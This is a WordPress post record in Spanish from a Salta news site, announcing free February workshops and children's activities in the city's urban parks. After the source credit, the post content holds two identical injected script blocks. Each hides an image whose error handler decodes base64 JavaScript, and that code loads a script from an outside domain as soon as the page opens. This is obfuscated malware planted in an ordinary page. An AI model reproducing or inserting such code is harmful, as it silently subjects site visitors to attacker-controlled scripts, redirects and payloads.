{"id":3599,"date":"2024-02-01T21:44:01","date_gmt":"2024-02-02T00:44:01","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3599"},"modified":"2025-08-14T00:01:32","modified_gmt":"2025-08-14T03:01:32","slug":"en-febrero-disfruta-de-actividades-recreativas-en-los-parques-urbanos","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3599","title":{"rendered":"En febrero disfrut\u00e1 de actividades recreativas en los Parques Urbanos"},"content":{"rendered":"\n<h5 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-54eadfd4bd20734fca8210f1eb86aa10\" style=\"background-color:#660c3d\"><em>Las actividades para todas las edades son gratuitas, algunas requieren inscripci\u00f3n previa. Las mascotas deben ingresar y permanecer con correa. El horario de los parques es de 7 a 22.<\/em><\/h5>\n\n\n\n<p>Los&nbsp;<strong>Parques Urbano<\/strong>s ofrecen numerosas actividades gratuitas para todas las edades; algunos talleres son con cupo y requieren inscripci\u00f3n previa en los siguientes tel\u00e9fonos:<\/p>\n\n\n\n<p>Parque del Bicentenario: 3874 76-6677<\/p>\n\n\n\n<p>Parque Sur: 3874 56 7871<\/p>\n\n\n\n<p>Parque de la Familia: en el SUM del parque o al tel\u00e9fono 3874713195<\/p>\n\n\n\n<p>Se recuerda que las mascotas deben ingresar y permanecer con correa. Se recomienda protegerse del sol y mantenerse hidratado.<\/p>\n\n\n\n<p><strong>Febrero<\/strong><\/p>\n\n\n\n<p><strong>Parque De La Familia<\/strong><\/p>\n\n\n\n<p>Taller: organizador de escritorio (para ni\u00f1os)<\/p>\n\n\n\n<p>mi\u00e9rcoles 14\/02 de 16.00 a 18.00<\/p>\n\n\n\n<p>de 7 a\u00f1os hasta 15 a\u00f1os<\/p>\n\n\n\n<p>Cupo: &nbsp;15 personas&nbsp;<\/p>\n\n\n\n<p><strong>Parque Sur<\/strong><\/p>\n\n\n\n<p>Taller: organizador de escritorio (para ni\u00f1os)<\/p>\n\n\n\n<p>jueves 15\/02 de 16.00 a 18.00<\/p>\n\n\n\n<p>de 7 a\u00f1os hasta 15 a\u00f1os<\/p>\n\n\n\n<p>Cupo: 15 personas&nbsp;<\/p>\n\n\n\n<p><strong>Parque del Bicentenario<\/strong><\/p>\n\n\n\n<p>Taller: organizador de escritorio (para ni\u00f1os)<\/p>\n\n\n\n<p>viernes 16 de 16.00 a 18.00<\/p>\n\n\n\n<p>de 7 a\u00f1os hasta 15 a\u00f1os<\/p>\n\n\n\n<p>Cupo: 15 personas&nbsp;<\/p>\n\n\n\n<p><strong>Parque De La Familia<\/strong><\/p>\n\n\n\n<p>Taller: llaveros en macram\u00e9 (para adultos)<\/p>\n\n\n\n<p>mi\u00e9rcoles 21\/02<\/p>\n\n\n\n<p>De 16.00 a 18.00<\/p>\n\n\n\n<p>de 15 a\u00f1os en adelante<\/p>\n\n\n\n<p>Cupo: 15 personas<\/p>\n\n\n\n<p><strong>Parque Sur<\/strong><\/p>\n\n\n\n<p>Taller: llaveros en macram\u00e9 (para adultos)<\/p>\n\n\n\n<p>jueves 22\/02 De 16.00 a 18.00<\/p>\n\n\n\n<p><strong>Parque Del Bicentenario<\/strong><\/p>\n\n\n\n<p>Taller: llaveros en macram\u00e9 (para adultos)<\/p>\n\n\n\n<p>&nbsp;viernes 23\/02 De 16.00 a 18.00<\/p>\n\n\n\n<p>de 15 a\u00f1os en adelante<\/p>\n\n\n\n<p>Cupo: 15 personas<\/p>\n\n\n\n<p><strong>Parque del Bicentenario<\/strong><\/p>\n\n\n\n<p>Miercoles:7\/14\/21 de Febrero<\/p>\n\n\n\n<p>Horario: 17.30 a 19:30 hs<\/p>\n\n\n\n<p>De 8 a 14 a\u00f1os<\/p>\n\n\n\n<p>Cupo: 30 personas<\/p>\n\n\n\n<p>Elementos que deben traer: Gorra, botella de agua, protector solar, toalla<\/p>\n\n\n\n<p><strong>Actividades a desarrollar<\/strong><\/p>\n\n\n\n<p>Charla inicial sobre Comportamiento y Respeto hacia la Naturaleza y el Grupo Recorrido y caminata por el Parque guiados y acompa\u00f1ados por Personal de Bienvenida y un Profesor de Deporte Juegos en las Canchas: Opcional, Futbol, V\u00f3ley o Juegos recreativos&nbsp; Charla de Seguridad: a quien pido ayuda en caso de: Perderme \/ accidentarme entre otros.<\/p>\n\n\n\n<p>Aguas Danzantes y Laguna.<\/p>\n\n\n\n<p>Despedida en el Anfiteatro&nbsp;<\/p>\n\n\n\n<p><strong>Parque de la Familia<\/strong><\/p>\n\n\n\n<p>Juegos Recreativos&nbsp;<\/p>\n\n\n\n<p><strong>Martes 6<\/strong><\/p>\n\n\n\n<p>Horarios de 16 a 18<\/p>\n\n\n\n<p>Cupo 15 personas<\/p>\n\n\n\n<p>Edades: de 6 a 15 a\u00f1os<\/p>\n\n\n\n<p>Taller de Puntillismo<\/p>\n\n\n\n<p><strong>Mi\u00e9rcoles 7<\/strong><\/p>\n\n\n\n<p>Horarios de 16 a 18hs<\/p>\n\n\n\n<p>Cupo 15 personas<\/p>\n\n\n\n<p>Edades: de 6 a 15 a\u00f1os<\/p>\n\n\n\n<p>Juegos de Carnaval<\/p>\n\n\n\n<p><strong>Jueves 8<\/strong><\/p>\n\n\n\n<p>Horarios de 16 a 18<\/p>\n\n\n\n<p>Cupo 15 personas<\/p>\n\n\n\n<p>Edades: de 6 a 15 a\u00f1os<\/p>\n\n\n\n<p>Taller de Puntillismo<\/p>\n\n\n\n<p><strong>Viernes 9<\/strong><\/p>\n\n\n\n<p>Horarios de 16 a 18hs<\/p>\n\n\n\n<p>Cupo 15 personas<\/p>\n\n\n\n<p>Edades: de 6 a 15 a\u00f1os<\/p>\n\n\n\n<p>Taller Manualidades. \u201cArm\u00e1 tu cartuchera con materiales reciclados\u201d<\/p>\n\n\n\n<p><strong>Mi\u00e9rcoles 14<\/strong><\/p>\n\n\n\n<p>Horarios de 16 a 18<\/p>\n\n\n\n<p>Cupo 15 personas<\/p>\n\n\n\n<p>Edades: de 6 a 15 a\u00f1os<\/p>\n\n\n\n<p>Taller Manualidades \u00abForr\u00e1 tus carpetas y hac\u00e9 tus car\u00e1tulas\u00bb<\/p>\n\n\n\n<p><strong>Viernes 16<\/strong><\/p>\n\n\n\n<p>Horarios de 16 a 18hs<\/p>\n\n\n\n<p>Cupo 15 personas<\/p>\n\n\n\n<p>Edades: de 6 a 15 a\u00f1os<\/p>\n\n\n\n<p><strong>Parque Sur<\/strong><\/p>\n\n\n\n<p>Jugate en el Sur<\/p>\n\n\n\n<p>Todos los mi\u00e9rcoles y viernes de febrero.<\/p>\n\n\n\n<p>Horario: de 16:30 a 19.<\/p>\n\n\n\n<p>Edades: 6 a 12 a\u00f1os<\/p>\n\n\n\n<p>Cupo: 25 ni\u00f1os<\/p>\n\n\n\n<p>Actividades: huevo loco, el mejor bailar\u00edn: &nbsp;se buscar\u00e1 de tik tok una coreograf\u00eda y el ni\u00f1o que mejor imite gana el concurso., ladr\u00f3n y polic\u00eda, tirar los tarros, mozo mojado, balde con agua. Todos los jueves de febrero habr\u00e1 disponibles atriles para pintar: de 18 a 19:30.<br>&nbsp;<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/en-febrero-disfruta-de-actividades-recreativas-en-los-parques-urbanos-93989\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Las actividades para todas las edades son gratuitas, algunas requieren inscripci\u00f3n previa. Las mascotas deben ingresar y permanecer con correa. El horario de los parques es de 7 a 22. Los&nbsp;Parques Urbanos ofrecen numerosas actividades gratuitas para todas las edades; algunos talleres son con cupo y requieren inscripci\u00f3n previa en los siguientes tel\u00e9fonos: Parque del [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3600,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[11],"tags":[],"class_list":{"0":"post-3599","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-datos-utiles"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3599"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3599"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3599\/revisions"}],"predecessor-version":[{"id":6865,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3599\/revisions\/6865"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3600"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3599"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3599"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3599"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}